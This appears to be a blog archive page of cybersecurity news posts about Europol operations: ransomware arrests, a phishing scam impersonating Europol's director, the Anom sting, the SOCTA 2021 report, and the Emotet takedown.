On January 17, 2022, authorities from Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the United States, and the United Kingdom joined forces to disrupt VPNLab, with assistance from Europol.
Read more »
SQL Injections
Cyber Security Europol Phishing Mails Ransomware Security and Privacy SQL Injections

Europol Captured 'Target' 12 Suspects in Ransomware Cases

 

Europol announced this week that it has caught twelve suspects in various criminal groups who were causing havoc throughout the world by conducting ransomware assaults on key infrastructure, following a two-year investigation. 

According to Europol, the individuals are suspected of carrying out assaults on almost 1,800 people in 71 countries. The organisation is notorious for attacking huge corporations and is suspected of being behind an attack on Norsk Hydro, a worldwide aluminium producer located in Norway, in 2019, which prompted the company to halt operations across two continents. Europol seized more than $52,000 in cash and five luxury vehicles from the accused. 

The agency is presently conducting a forensic examination of the group's electronic devices in order to secure evidence and uncover fresh investigation leads. Europol and Eurojust, the European Union's body for criminal justice cooperation, organised the international sting, which comprised officials from eight different nations, including the United States and the United Kingdom. It happened on October 26 in Ukraine and Switzerland, as per Europol. It is unclear if the individuals have been arrested or charged, with Europol just stating that they were "targeted." 

The agency stated. “Most of these suspects are considered high-value targets because they are being investigated in multiple high-profile cases in different jurisdictions.” 

Each of the cybercriminals played a unique function inside the criminal organisations. Some were responsible for breaking into the victims' IT networks, which they accomplished through a variety of methods such as brute force attacks, SQL injections, stolen passwords, and phishing emails with harmful attachments. 

Following that, they would use malware such as Trickbot and other tools to remain undetected and obtain more access, according to Europol. 

“The criminals would then lay undetected in the compromised systems, sometimes for months, probing for more weaknesses in the IT networks before moving on to monetising the infection by deploying ransomware. The effects of the ransomware attacks were devastating as the criminals had had the time to explore the IT networks undetected.” 

The attackers encrypted the victims' files before sending a ransom letter demanding bitcoin payment in return for the decryption keys. If the ransom was paid, it was reported that certain suspects were in charge of laundering the money through mixing services and cashing out. 

Europol did not elaborate on the identities of the victims or why they may have been targeted. Back in the United Kingdom, ransomware attacks have been on the rise, with cybercriminals targeting big IT businesses and destroying infrastructure.
Read more »
Phishing scam
Cyber Fraud Europol PayPal Phishing scam

Fraudsters Pose as Europol Chief in an Attempt to Steal Victims PayPal Account Details

 

The federal police's Computer Crime Unit is looking into an identity fraud case concerning Catherine De Bolle, the executive head of the EU's law enforcement organization Europol. Fraudsters are masquerading as the director of Europol, the European Union's law enforcement organization, to mislead individuals into providing their financial information. 

The European Union Agency for Law Enforcement Cooperation, popularly known as Europol, previously called European Police Office and Europol Drugs Unit, is a law enforcement agency of the European Union (EU) constituted in 1998 to properly manage criminal intelligence and counteract significant global organized crime and terrorism through coexistence among competent authorities of EU member states. The Agency has no executive powers, as well as its personnel, are not authorized to detain suspects or act without prior consent from appropriate authorities in the member states. 

According to the Brussels Times, Belgian police have obtained numerous reports of emails posing to have been from Catherine De Bolle, Europol's executive director. The email badmouths the receiver of child pornography and sex trafficking before allegedly stealing the recipient's PayPal account details. 

Catherine De Bolle took over as Europol's executive director in 2018, following Rob Wainwright, whose tenure ended on May 1, 2018. She was previously the top commissioner of the Belgian federal police (1 March 2012–1 May 2018) as well as the police chief of zone Ninove (2001–2012). 

Europol, which had expressed concerns against this type of scam in April, asked web users not to fall for this fraud once again. 

“Our executive director would never contact members of the public threatening individuals with opening a criminal investigation,” tweeted Europol, which does investigate lots of actual cybercrime. 

The email is written in French and the sender introduces itself to be a COPJ – communication by an officer of the judicial police – and commences as: 

“At the request of Ms. Catherine De Bolle, Commissioner General of the Federal Police, elected to the post of Director of Europol — Brigade for the Protection of Minors (BPM), we are sending you this invitation. […] We are initiating legal proceedings against you for child pornography, pedophilia, exhibitionism, cyber pornography, and sex trafficking.” 

This email sent to individuals intimidates the receiver with criminal prosecution if they do not respond within 72 hours. 

“After this deadline, we will be obliged to send our report to the deputy prosecutor at the high court in Créteil [a suburb of Paris] and a cybercrime specialist to establish an arrest warrant against you.” 

This wasn't the first instance where Director De Bolle's name is being used in a phishing scam. Another fraudulent email claimed her power, and that of her successor as commissioner-general of the federal police, Marc De Mesmaeker, in March of this year. 

Following the FBI's Internet Crime Complaint Center, 12,827 individuals in the United States reported being victims of "government impersonation scams" in 2020, leading to severe losses of about $110 million. 

Whereas on the other hand, Check Point analysts disclosed in April 2020 that perhaps a ransomware gang was incarcerating Android phones, alleging victims of owning sexually explicit material and asserting that their personally identifiable information had been transmitted to an FBI data center.

Among the most high-profile cloning frauds, one came in July 2020, where fraudsters stole over $118,000 in bitcoin by hacking more than 100 famous Twitter accounts, including those of then-Amazon CEO Jeff Bezos and then-Democratic presidential contender Joe Biden.
Read more »
FBI
Cyber Security Encryption Europol FBI

International Sting Operation Cracks Down Encryption Criminal Groups

In an international sting operation targeting drug suppliers led to an arrest of a man. The suspect's face was blurred by the Australian Federal Police on privacy matters. The criminals while dealing with drug smuggling and money laundering, texted with each other, they were pretty confident that they'd not get caught because of a special encrypted platform the criminals were using for communication. However, the was only one issue with the group, that all these texts, which were in millions, were being tapped by the FBI. 

As a matter of fact, the FBI had sent these Anom devices to the black market. Operation Trojan Shield has these details and allegations revolving around it. It is an international operation led by the FBI which has resulted in more than 800 arrests. NPR says "the document includes transcripts of smugglers' conversations in which they name their prices and handling fees and describe their methods. Many of them also sent snapshots to each other, showing packages of cocaine and other drugs. They discussed strategies, from adding drugs to diplomatic pouches to filling pineapples and tuna cans with cocaine." 

Law enforcement agencies captured around 8 tonnes of cocaine, around 22 tonnes of cannabis, and several other drugs (in tonnes). Besides this, authorities have seized "55 luxury vehicles and over $48 million in various worldwide currencies and cryptocurrencies," says Interpol, a European law enforcement agency. As per the FBI, the agencies worked together to provide these criminal organization that operates all over the world more than 12,000 devices. Europol says it has been one of the largest and sophisticated crackdown operations on encryption criminal activities to date. Using Anom, FBI, and Europol around 300 Transnational Criminal Organizations (TCO). 

These include Italian organized crime group Outlaw Motorcycle gangs and other narcotics source (international), distribution systems, and transportation. "Law enforcement agencies were in a unique position to help the new Anom device find its market. In recent years, they've taken down three similar networks — Phantom Secure, EncroChat and, earlier this year, Sky Global — boosting criminals' demand for a new alternative," said NPR.

Read more »
THB
Cyber Crime Dark Web EU Europol SOCTA THB

SOCTA: Here's a Quick Look into the Report by Europol

 

The Serious Organized Crime Threat Assessment study 2021 by Europol summarises the criminal threat from the last four years and offers insights into what can be expected in the following four years. Organized crime isn't just cybercrime, but cybercrime is now a big component of organized crime. Europol sees the development of businesses, growth in the digital lifestyle, and the rise of remote workers as new vulnerabilities and opportunities for use. 

“Critical infrastructures will continue to be targeted by cybercriminals in the coming years, which poses significant risks,” cautions the published report. “Developments such as the expansion of the Internet of Things (IoT), the increased use of artificial intelligence (AI), applications for biometrics data, or the availability of autonomous vehicles will have a significant impact. These innovations will create criminal opportunities.” 

The interruption of Emotet Botnet in January 2021, with foreign activities organized by Europol, is highlighted in the report. This includes the international efforts concerning the authorities of the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine. But the overall thought is that cybercrime is growing in sophisticated ways with criminal gangs being increasingly organized due to which the threat is multiplying at a fast rate. However, the Europol report does not comment on the usual cyber threats, apart from the fact that crime syndicates sell it 'as a service more and more. 

ENISA estimates that 230,000 new malware variants are detected each day. Europol shows that the number and sophistication of attacks continue to increase. “The increase in the number of attacks on public institutions and large companies is particularly notable.” Further, the DDoS - Denial of service is an expanding threat, frequently followed by attempts at extortion. Attacks on government and vital resources continue, but criminal groups with lower security protocols increasingly target smaller organizations. 

“Last year saw a multitude of damaging consequences from ransomware, breaches, and targeted attacks against sensitive data,” comments Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber. Cyber attackers have taken full advantage of the much more critical vulnerabilities at the detriment of the organizations, ranging from hacks of COVID-19 study data to assaults on critical networks and government agencies. The increase in online child exploits, especially what is recognized as the live distance violence, also occurred as students experienced months at home during school closures. Besides, Europol states that it has a database of over 40 million pictures from around the globe of child sexual abuse. 

Furthermore, there shouldn’t be an underestimation of the involvement of the Dark Web in illegal activities, where criminals use it to share their knowledge on operating security. The usage of the dark web for the selling of illicit drugs and weapons has increased over the past four years, but law enforcement has seemed to have caused some mistrust among consumers and might have cooled down the growth rate in association with online assaults. Sex trafficking (THB) is also carried out on the dark web and surface web pages where labor and sex are the main categories. Europol claims that THB is substantially underreported and states that in the EU, THB is on the rise for labor exploitation. 

Even the complexity of technology has increased with the inception of fraud such as investment fraud, BEC, non-deployment fraud, novelty fraud, fake invoice fraud, social profit fraud, bank fraud, etc. This will probably go on. Also “The use of deep fakes will make it much more challenging to identify and counter fraud,” warns Europol. And the organized crime ecosystem is marked by a networked environment with smooth, systemic, and profitable coordination among criminals.
Read more »
Operation Ladybird
Emotet Europol malware Operation Ladybird

Emotet - 'Most Dangerous Malware in the World' Disrupted by the Law Enforcement Agencies

 

The European Union Agency for Law Enforcement announced that a global collaboration of law enforcement agencies had disrupted Emotet, what it called the ‘most dangerous malware in the world’.

‘Operation ladybird’ was conducted via a collaboration of private security experts with global law enforcement agencies to disrupt Emotet and take charge of Emotet’s command-and-control infrastructure. While conducting the raid Ukrainian police arrested at least two Ukrainian citizens working for the cybercriminal group.

Ukrainian law enforcement published a video showing officers seizing cash, computer equipment, and rows of gold bars. Neither Europol nor the Ukrainian police has shared the details regarding threat actors or their asserted role in the Emotet group. Ukrainian authorities released a statement explaining that “other members of an international hacker group who used the infrastructure of the Emotet bot network to conduct cyberattacks have also been identified. Measures are being taken to detain them”.

Europol stated that “the Emotet infrastructure essentially acted as a primary door opener for computer systems on a global scale”. A malware globally known as Emotet has jeopardized the free-flowing working of the Internet and has grown into one of the biggest botnets across the globe and ruining organizations with data theft and ransomware.

In 2014, Emotet was initially known as a banking trojan, the malware gradually evolved into a powerful weapon used by threat actors across the globe to secure unauthorized access to computer systems. Emotet’s designers known as APT group TA542 shared the malware with other threat actors who used malware to install banking trojans or ransomware, onto a victim’s computer system.

Interpol stated that “the infrastructure that was used by Emotet involved several hundreds of servers located across the world, all of these having different functionalities to manage the computers of the infected victims, to spread to new ones, to serve other criminal groups, and to ultimately make the network more resilient against takedown attempts”.
Read more »
Subscribe to: Posts (Atom)